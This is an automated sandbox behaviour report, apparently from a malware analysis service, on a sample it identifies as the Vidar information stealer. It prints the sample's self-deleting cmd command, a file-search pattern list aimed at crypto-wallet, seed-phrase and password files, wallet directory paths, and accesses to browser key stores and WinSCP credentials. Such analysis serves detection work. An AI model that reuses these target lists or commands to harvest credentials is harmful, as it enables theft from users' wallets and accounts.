              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7152 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6xb1d" & exitJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7396 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: BHgwhz3lGN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: BHgwhz3lGN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: BHgwhz3lGN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: BHgwhz3lGN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: BHgwhz3lGN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: BHgwhz3lGN.exeStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D1C0 pushad ; ret 0_3_0067D1C1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D1C0 pushad ; ret 0_3_0067D1C1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_006715A4 push eax; iretd 0_3_006715A5
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_006715A4 push eax; iretd 0_3_006715A5
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D518 pushfd ; iretd 0_3_0067D519
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D518 pushfd ; iretd 0_3_0067D519
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D1C0 pushad ; ret 0_3_0067D1C1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D1C0 pushad ; ret 0_3_0067D1C1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_006715A4 push eax; iretd 0_3_006715A5
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_006715A4 push eax; iretd 0_3_006715A5
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D518 pushfd ; iretd 0_3_0067D519
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_3_0067D518 pushfd ; iretd 0_3_0067D519
              Source: BHgwhz3lGN.exeStatic PE information: section name: .text entropy: 6.80330329226556

              Boot Survival

              barindex
              Monitors registry run keys for changes
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 6096Thread sleep count: 81 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041008C FindFirstFileA,0_2_0041008C
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004291EA FindFirstFileA,0_2_004291EA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00428248 FindFirstFileA,memset,memset,0_2_00428248
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042A4E5 FindFirstFileA,0_2_0042A4E5
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040E749 FindFirstFileA,0_2_0040E749
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040177C FindFirstFileA,0_2_0040177C
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00412AC9 FindFirstFileA,0_2_00412AC9
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040CCEA FindFirstFileA,0_2_0040CCEA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042BD1E FindFirstFileA,0_2_0042BD1E
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004018DA FindFirstFileA,0_2_004018DA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00428DDA GetLogicalDriveStringsA,0_2_00428DDA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041F9A3 GetSystemInfo,0_2_0041F9A3
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: Web Data.10.drBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: Web Data.10.drBinary or memory string: global block list test formVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: Web Data.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<3
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.000000000046E000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Web Data.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: Web Data.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: Web Data.10.drBinary or memory string: tasks.office.comVMware20,11696497155o
              Source: Web Data.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: bankofamerica.comVMware20,11696497155x
              Source: Web Data.10.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SA
              Source: Web Data.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: Web Data.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: Web Data.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: Web Data.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: Web Data.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: interactivebrokers.comVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: AMC password management pageVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: Web Data.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: Web Data.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: Web Data.10.drBinary or memory string: discord.comVMware20,11696497155f
              Source: Web Data.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: Web Data.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: Web Data.10.drBinary or memory string: outlook.office365.comVMware20,11696497155t
              Source: Web Data.10.drBinary or memory string: outlook.office.comVMware20,11696497155s
              Source: Web Data.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: Web Data.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: Web Data.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6xb1d" & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: GetLocaleInfoA,0_2_0041F6B3
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042D98B EntryPoint,GetUserNameW,0_2_0042D98B
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041F53D GetTimeZoneInformation,0_2_0041F53D
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Vidar stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BHgwhz3lGN.exe PID: 7428, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.doc,*.docx,*.xls*,*.csv*,*.jpg,*.json,*.html,*.dat,*.pdf,*.rtf,*.tiff
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.doc,*.docx,*.xls*,*.csv*,*.jpg,*.json,*.html,*.dat,*.pdf,*.rtf,*.tiff
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.doc,*.docx,*.xls*,*.csv*,*.jpg,*.json,*.html,*.dat,*.pdf,*.rtf,*.tiff
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MultiDoge
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\key4.dbJump to behavior
